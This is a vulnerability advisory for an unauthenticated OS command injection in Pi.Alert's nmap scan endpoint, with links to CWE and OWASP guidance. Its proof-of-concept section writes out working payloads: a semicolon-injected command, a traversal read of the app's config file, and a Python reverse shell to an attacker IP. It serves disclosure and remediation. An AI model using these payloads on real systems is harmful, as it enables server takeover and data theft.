Summary

An OS Command injection vulnerability allows any unauthenticated user to execute arbitrary code on the server.

Details

The affected code can be found here:
https://github.com/jokob-sk/Pi.Alert/blob/main/front/php/server/nmap_scan.php
As well as the corresponding leiweibau fork.
Here is the CWE with more information on how the vulnerability works and can be fixed.
https://cwe.mitre.org/data/definitions/78.html

Some other helpful links:
https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection
https://owasp.org/www-community/attacks/Command_Injection

PoC

Using the default configuration, click on any device and then navigate to the nmap tab. Click on one of the nmap buttons and intercept the request via Burp Proxy. Modify the request by adding a semi-colon and then whatever other command you want to run after the scan=.

scan=192.168.1.5&mode=fast

to

scan=;whoami&mode=fast

it will come back as www-data

another useful command is

scan=;cat ../../../config/pialert.conf&mode=fast

Reverse shell via python (change the ip and port to match attacker machine):

scan=;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.63",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'&mode=fast

Video of the POC (unlisted video):
https://youtu.be/BR43Af5iykE

This same request can result in XSS as well but eh to that because un-authenticated internal only app.

Impact

An attacker with access to the pi.alert web UI would be able to run code on server.